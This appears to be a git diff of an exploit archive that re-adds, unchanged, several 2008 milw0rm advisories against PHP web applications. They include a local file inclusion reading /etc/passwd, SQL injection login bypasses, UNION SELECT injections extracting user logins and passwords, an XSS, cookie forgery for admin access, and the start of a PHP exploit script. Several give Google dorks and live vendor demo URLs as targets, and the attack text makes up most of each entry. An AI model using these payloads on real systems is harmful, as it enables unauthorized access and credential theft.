-#in the lang parameter to actions.php. #
-# #
-# #
-# #
-#Appplication still unpatched #
-# #
-#vulnerable code in actions.php #
-# #
-#/* code start #
-# case 27: #
-# $do = $_GET['do']; #
-# if($do == "theme" && file_exists("themes/".$_GET['theme'])){ #
-# setcookie('theme', $_GET['theme'], time()+60*60*24*30); #
-# $_SESSION['theme'] = $_GET['theme']; #
-# unset($_SESSION['theme_name']); #
-# } else if($do == "lang" && file_exists("lang/".$_GET['lang'])){ #
-# setcookie('language', $_GET['lang'], time()+60*60*24*30); #
-# $_SESSION['language'] = $_GET['lang']; #
-# unset($_SESSION['lang_name']); #
-# } #
-# header("Location: main.php"); #
-# #
-#/* code end #
-# #
-#$_SESSION['language'] is set to the value of the lang parameter without any #
-#sanitization. #
-# #
-#The actions.php will send this $_SESSION['language'] value to required.php which will #
-#pass it to include() function without any sanitization. #
-# #
-# #
-#vulnerable code in required.php #
-# #
-#/* code start #
-# #
-#line 22 in required.php: include("lang/".$_SESSION['language']."/lang.php"); #
-# #
-#/* code end #
-#########################################################################################
-
-
-POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang&lang=../../../../../../../../../../etc/passwd%00
-
-
-#########################################################################################
-# references: #
-# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454 #
-# http://secunia.com/advisories/31820 #
-#########################################################################################
-
-# milw0rm.com [2008-11-06]
+##################################################################################
+# #
+# Author: Vinod Sharma #
+# Email: vinodsharma.mimit@gmail.com #
+# Date: 05th Nov, 2008 #
+# Note: This information is only for educational purpose, author #
+# will not bear responsibility for any damages. #
+##################################################################################
+
+
+#########################################################################################
+#Directory traversal vulnerability in MySQL Quick Admin 1.5.5 #
+#allows remote attackers to read and execute arbitrary files via a .. (dot dot) #
+#in the lang parameter to actions.php. #
+# #
+# #
+# #
+#Appplication still unpatched #
+# #
+#vulnerable code in actions.php #
+# #
+#/* code start #
+# case 27: #
+# $do = $_GET['do']; #
+# if($do == "theme" && file_exists("themes/".$_GET['theme'])){ #
+# setcookie('theme', $_GET['theme'], time()+60*60*24*30); #
+# $_SESSION['theme'] = $_GET['theme']; #
+# unset($_SESSION['theme_name']); #
+# } else if($do == "lang" && file_exists("lang/".$_GET['lang'])){ #
+# setcookie('language', $_GET['lang'], time()+60*60*24*30); #
+# $_SESSION['language'] = $_GET['lang']; #
+# unset($_SESSION['lang_name']); #
+# } #
+# header("Location: main.php"); #
+# #
+#/* code end #
+# #
+#$_SESSION['language'] is set to the value of the lang parameter without any #
+#sanitization. #
+# #
+#The actions.php will send this $_SESSION['language'] value to required.php which will #
+#pass it to include() function without any sanitization. #
+# #
+# #
+#vulnerable code in required.php #
+# #
+#/* code start #
+# #
+#line 22 in required.php: include("lang/".$_SESSION['language']."/lang.php"); #
+# #
+#/* code end #
+#########################################################################################
+
+
+POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang&lang=../../../../../../../../../../etc/passwd%00
+
+
+#########################################################################################
+# references: #
+# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454 #
+# http://secunia.com/advisories/31820 #
+#########################################################################################
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7021.txt b/platforms/php/webapps/7021.txt
index 55c9ffbfc..78431f43a 100755
--- a/platforms/php/webapps/7021.txt
+++ b/platforms/php/webapps/7021.txt
@@ -1,65 +1,65 @@ -********************************************************************************************* -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!]O O O O O [!] -[!]O O O [!] -[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!]O OOO OOO O O O O OO O O O O OO O O O [!] -[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!]O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO [!] -********************************************************************************************* -Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR ---------------------------------------------------------------------------------------------- -= Softcomplex PHP Image Gallery v1.0 (Auth Bypass) SQL Injection Vulnerability = ---------------------------------------------------------------------------------------------- - ---------------------------------------------------------------------------------------------- --===========================================================================================- --= Discovred By : Cyber-Zone =- --= =- --= E-mail : paradis_des_fous@hotmail.fr =- --= =- --= Home : WwW.IQ-Ty.CoM =- --===========================================================================================- ---------------------------------------------------------------------------------------------- - -Download : http://www.softcomplex.com/products/php_image_gallery/ - -Dork In GooGle : Powered by PHP Image Gallery - -Bypass : - -Go To Admin Panel : - -Login With this information : - -Admin : admin ' or ' 1=1 -pass : Cyber-Zone or any thing - -Loged in :) - -Live demo : - -http://www.softcomplex.com/products/php_image_gallery/demo/index.php?action=login - -EnjoY - - - ---------------------------------------------------------------------------------------------- --======================================= ThanX To 
==========================================- --= Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord =- --= =- --= StaCk , The_5pectrum , (JIKO) No-Exploit =- --= =- --= Oujda SeCurity TeaM =- --===========================================================================================- ---------------------------------------------------------------------------------------------- -AttaCk Is CompLeT :) - -# milw0rm.com [2008-11-06] +********************************************************************************************* +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!]O O O O O [!] +[!]O O O [!] +[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!]O OOO OOO O O O O OO O O O O OO O O O [!] +[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!]O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO [!] +********************************************************************************************* +Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR +--------------------------------------------------------------------------------------------- += Softcomplex PHP Image Gallery v1.0 (Auth Bypass) SQL Injection Vulnerability = +--------------------------------------------------------------------------------------------- + +--------------------------------------------------------------------------------------------- +-===========================================================================================- +-= Discovred By : Cyber-Zone =- +-= =- +-= E-mail : paradis_des_fous@hotmail.fr =- +-= =- +-= Home : WwW.IQ-Ty.CoM =- +-===========================================================================================- +--------------------------------------------------------------------------------------------- + +Download : http://www.softcomplex.com/products/php_image_gallery/ + +Dork In GooGle : Powered by PHP 
Image Gallery + +Bypass : + +Go To Admin Panel : + +Login With this information : + +Admin : admin ' or ' 1=1 +pass : Cyber-Zone or any thing + +Loged in :) + +Live demo : + +http://www.softcomplex.com/products/php_image_gallery/demo/index.php?action=login + +EnjoY + + + +--------------------------------------------------------------------------------------------- +-======================================= ThanX To ==========================================- +-= Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord =- +-= =- +-= StaCk , The_5pectrum , (JIKO) No-Exploit =- +-= =- +-= Oujda SeCurity TeaM =- +-===========================================================================================- +--------------------------------------------------------------------------------------------- +AttaCk Is CompLeT :) + +# milw0rm.com [2008-11-06] diff --git a/platforms/php/webapps/7025.txt b/platforms/php/webapps/7025.txt index 6816536c6..3276d0c06 100755 --- a/platforms/php/webapps/7025.txt +++ b/platforms/php/webapps/7025.txt 
@@ -1,46 +1,46 @@
-[~] deltascripts phpShop Remote Auth Bypass Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 06.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] dork: "Powered by PHP Shop from DeltaScripts"
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin
-
-
-admin login for demo:
-
-http://demo.deltascripts.com/phpshop/admin/login.php
-
-
-example for demo:
-
-admin: admin ' or ' 1=1
-
-passwd: ZoRLu
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-06]
+[~] deltascripts phpShop Remote Auth Bypass Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 06.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] dork: "Powered by PHP Shop from DeltaScripts"
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin
+
+
+admin login for demo:
+
+http://demo.deltascripts.com/phpshop/admin/login.php
+
+
+example for demo:
+
+admin: admin ' or ' 1=1
+
+passwd: ZoRLu
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7026.txt b/platforms/php/webapps/7026.txt
index a83ae72fc..3d9ba88e3 100755
--- a/platforms/php/webapps/7026.txt
+++ b/platforms/php/webapps/7026.txt
@@ -1,35 +1,35 @@
-SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
-___________________________________
-
-Author: Hussin X
-
-Home : www.IQ-TY.com & www.TrYaG.cc
-
-MaiL : darkangeL_G85@Yahoo.CoM
-___________________________________
-
-script : http://www.softcomplex.com/products/php_image_gallery/demo2/
-
-_____
-
-ExploiT & demo
-_____________
-
-http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|_____________________________________________________________________
-
-
- Im IRAQi | Im TrYaGi
-
-# milw0rm.com [2008-11-06]
+SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
+___________________________________
+
+Author: Hussin X
+
+Home : www.IQ-TY.com & www.TrYaG.cc
+
+MaiL : darkangeL_G85@Yahoo.CoM
+___________________________________
+
+script : http://www.softcomplex.com/products/php_image_gallery/demo2/
+
+_____
+
+ExploiT & demo
+_____________
+
+http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|_____________________________________________________________________
+
+
+ Im IRAQi | Im TrYaGi
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7027.txt b/platforms/php/webapps/7027.txt index b08763122..570bf0ad7 100755 --- a/platforms/php/webapps/7027.txt +++ b/platforms/php/webapps/7027.txt 
@@ -1,62 +1,62 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - Software Directory v1.0 (SQL/XSS) Remote SQL Vulnerability -============================================================================== - - [»] Script: [ Software Directory v1.0 ] - [»] Language: [ PHP ] - [»] Website: [ http://www.turnkeyforms.com/software-directory.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 06.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [ SQLi ] - [»] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5-- - - - [ XSS ] - [»] http://localhost/[path]/signinform.php?msg="> - - - - -===[ LIVE ]=== - - [ SQLi ] - [»] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5-- - - [ XSS ] - [»] http://demo.turnkeyforms.com/software-directory/signinform.php?msg="> - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); //EoX -=============================================================================== - -# milw0rm.com [2008-11-06] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + Software Directory v1.0 (SQL/XSS) Remote SQL Vulnerability +============================================================================== + + [»] Script: [ Software Directory v1.0 ] + [»] Language: [ PHP ] + [»] Website: [ http://www.turnkeyforms.com/software-directory.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 06.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [ SQLi ] + [»] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5-- + + + [ XSS ] + [»] http://localhost/[path]/signinform.php?msg="> + + + + +===[ LIVE ]=== + + [ SQLi ] + [»] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5-- + + [ XSS ] + [»] http://demo.turnkeyforms.com/software-directory/signinform.php?msg="> + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... 
+ +=============================================================================== +exit(); //EoX +=============================================================================== + +# milw0rm.com [2008-11-06] diff --git a/platforms/php/webapps/7028.txt b/platforms/php/webapps/7028.txt index a93bdea98..d53e0ec8c 100755 --- a/platforms/php/webapps/7028.txt +++ b/platforms/php/webapps/7028.txt 
@@ -1,56 +1,56 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - Entertainment Portal v2.0 Insecure Cookie Handling Vulnerability -============================================================================== - - [»] Script: [ Entertainment Portal v2.0 ] - [»] Language: [ PHP ] - [»] Website: [ http://www.turnkeyforms.com/entertainment-portal.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 06.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - Admin-Panel: http://localhost/[path]/admin/ - - [»] javascript:document.cookie = "adminLogged=Administrator"; - - - -===[ LIVE ]=== - - [»] http://mediacms.demo.turnkeyforms.com/admin/ - - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); //EoX -=============================================================================== - -# milw0rm.com [2008-11-07] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + Entertainment Portal v2.0 Insecure Cookie Handling Vulnerability +============================================================================== + + [»] Script: [ Entertainment Portal v2.0 ] + [»] Language: [ PHP ] + [»] Website: [ http://www.turnkeyforms.com/entertainment-portal.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 06.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + Admin-Panel: http://localhost/[path]/admin/ + + [»] javascript:document.cookie = "adminLogged=Administrator"; + + + +===[ LIVE ]=== + + [»] http://mediacms.demo.turnkeyforms.com/admin/ + + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); //EoX +=============================================================================== + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7029.txt b/platforms/php/webapps/7029.txt index 732cdca7e..5924bca18 100755 --- a/platforms/php/webapps/7029.txt +++ b/platforms/php/webapps/7029.txt 
@@ -1,53 +1,53 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - Business Survey Pro 1.0 (survey_results_text.php id) Remote SQL Vulnerability -============================================================================== - - [»] Script: [ Business Survey Pro 1.0 ] - [»] Language: [ PHP ] - [»] Website: [ http://www.turnkeyforms.com/business-survey-pro.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 06/11/2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [»] http://localhost/[path]/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5-- - - -===[ LIVE ]=== - - [»] http://business-survey-pro.demo.turnkeyforms.com/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5-- - - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); //EoX -=============================================================================== - -# milw0rm.com [2008-11-07] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + Business Survey Pro 1.0 (survey_results_text.php id) Remote SQL Vulnerability +============================================================================== + + [»] Script: [ Business Survey Pro 1.0 ] + [»] Language: [ PHP ] + [»] Website: [ http://www.turnkeyforms.com/business-survey-pro.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 06/11/2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [»] http://localhost/[path]/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5-- + + +===[ LIVE ]=== + + [»] http://business-survey-pro.demo.turnkeyforms.com/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5-- + + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); //EoX +=============================================================================== + +# milw0rm.com [2008-11-07] 
diff --git a/platforms/php/webapps/7030.txt b/platforms/php/webapps/7030.txt index d225a5692..f6c041fed 100755 --- a/platforms/php/webapps/7030.txt +++ b/platforms/php/webapps/7030.txt 
@@ -1,59 +1,58 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - -<> site : www.tryag.cc/cc - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : Mole Group Pizza Script - -<<->> script demo : www.mole-group.com/content/view/38/51/ - - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - >>>> www.site.me/index.php?manufacturers_id=-1+union+select+user()--&osCsid=0d4d9ec8a0cf2aba5f633bb4691aea2c - http://xxxxxxx/index.php?manufacturers_id=-1+union+select+convert(user()+using+latin1)/* - - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - - -<<->> All freinds and all muslims - - -# milw0rm.com [2008-11-07] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + +<> site : www.tryag.cc/cc + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : Mole Group Pizza Script + +<<->> script demo : www.mole-group.com/content/view/38/51/ + + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + >>>> www.site.me/index.php?manufacturers_id=-1+union+select+user()--&osCsid=0d4d9ec8a0cf2aba5f633bb4691aea2c + http://xxxxxxx/index.php?manufacturers_id=-1+union+select+convert(user()+using+latin1)/* + + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + + +<<->> All freinds and all muslims + + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7031.php b/platforms/php/webapps/7031.php index 3092e893e..bd143cd85 100755 --- a/platforms/php/webapps/7031.php +++ b/platforms/php/webapps/7031.php 
@@ -1,231 +1,231 @@ -starting(); -$exploit->is_vulnerable($domain); -$exploit->exploiting($domain,$mymode); - - - -class Exploit -{ - function http_request($host,$data) - { - - if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) - { - echo "socket_create() error!\r\n"; - exit; - } - if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) - { - echo "socket_set_option() error!\r\n"; - exit; - } - - if(!socket_connect($socket,$host,80)) - { - echo "socket_connect() error!\r\n"; - exit; - } - if(!socket_write($socket,$data,strlen($data))) - { - echo "socket_write() errror!\r\n"; - exit; - } - - while($get = socket_read($socket,1024,PHP_NORMAL_READ)) - { - $content .= $get; - } - - socket_close($socket); - - $array = array( - 'HTTP/1.1 404 Not Found', - 'HTTP/1.1 300 Multiple Choices', - 'HTTP/1.1 301 Moved Permanently', - 'HTTP/1.1 302 Found', - 'HTTP/1.1 304 Not Modified', - 'HTTP/1.1 400 Bad Request', - 'HTTP/1.1 401 Unauthorized', - 'HTTP/1.1 402 Payment Required', - 'HTTP/1.1 403 Forbidden', - 'HTTP/1.1 405 Method Not Allowed', - 'HTTP/1.1 406 Not Acceptable', - 'HTTP/1.1 407 Proxy Authentication Required', - 'HTTP/1.1 408 Request Timeout', - 'HTTP/1.1 409 Conflict', - 'HTTP/1.1 410 Gone', - 'HTTP/1.1 411 Length Required', - 'HTTP/1.1 412 Precondition Failed', - 'HTTP/1.1 413 Request Entity Too Large', - 'HTTP/1.1 414 Request-URI Too Long', - 'HTTP/1.1 415 Unsupported Media Type', - 'HTTP/1.1 416 Request Range Not Satisfiable', - 'HTTP/1.1 417 Expectation Failed', - 'HTTP/1.1 Retry With', - ); - - for($i=0;$i<=count($array);$i++) - - if(eregi($array[$i],$content)) - { - return ("$array[$i]\r\n"); - break; - } - else - { - return ("$content\r\n"); - break; - } - } - - function is_vulnerable($host) - { - $host = explode('/',$host); - - $header .= "GET /$host[1]/modules/3rdparty/adminpart/add3rdparty.php?module=%27 HTTP/1.1\r\n"; - $header .= "Host: $host[0]\r\n"; - $header .= "User-Agent: athos~doesntexist\r\n"; - $header .= "Connection: close\r\n\r\n"; - - 
if(stristr($this->http_request($host[0],$header),"\\'")) - { - echo "[+] Magic Quotes GPC On!\n"; - echo "[+] Exploit Failed!\n"; - exit; - } - else - { - return false; - } - } - - function starting() - { - global $argv; - - if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1])) - { - echo "[+] e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit\r\n"; - echo "[+] by athos\r\n"; - echo " -----------------------------------------------------------\r\n"; - echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n"; - echo "[+] Usage: php $argv[0] [host/path] [save]\r\n"; - echo "[+] Usage: php $argv[0] [host/path] \r\n"; - exit; - } - } - - function exploiting($host,$mode) - { - $host = explode('/',$host); - $i = 0; - - - echo "[+] Local File (ex: ../../etc/passwd%00)\r\n"; - echo "[+] Local File: "; - $file = stripslashes(trim(fgets(STDIN))); - - if(empty($file)) die("you fail"); - - $array = array ( - "3rdparty/adminpart/add3rdparty.php?module=$file", - "polling/adminpart/addpolling.php?module=$file", - "contact/adminpart/addcontact.php?module=$file", - "brandnews/adminpart/addbrandnews.php?module=$file", - "newsletter/adminpart/addnewsletter.php?module=$file", - "game/adminpart/addgame.php?module=$file", - "tour/adminpart/addtour.php?module=$file", - "articles/adminpart/addarticles.php?module=$file", - "product/adminpart/addproduct.php?module=$file", - "plain/adminpart/addplain.php?module=$file", - ); - - if($i > 9) - { - $write .= "GET /$host[1]/admin/ind_ex.php HTTP/1.1\r\n"; - $write .= "Host: $host[0]\r\n"; - $write .= "User-Agent: doesntexist\r\n"; - $write .= "Cookie: adminlang=$file; path=/admin\r\n"; - $write .= "Connection: close\r\n\r\n"; - } - else - { - - $write .= "GET /$host[1]/modules/$array[$i] HTTP/1.1\r\n"; - $write .= "Host: $host[0]\r\n"; - $write .= "User-Agent: you are lost\r\n"; - $write .= "Connection: close\r\n\r\n"; - } - - if(stristr($this->http_request($host[0],$write),'No such file or directory in')) - { - $i++; - } - else - { - 
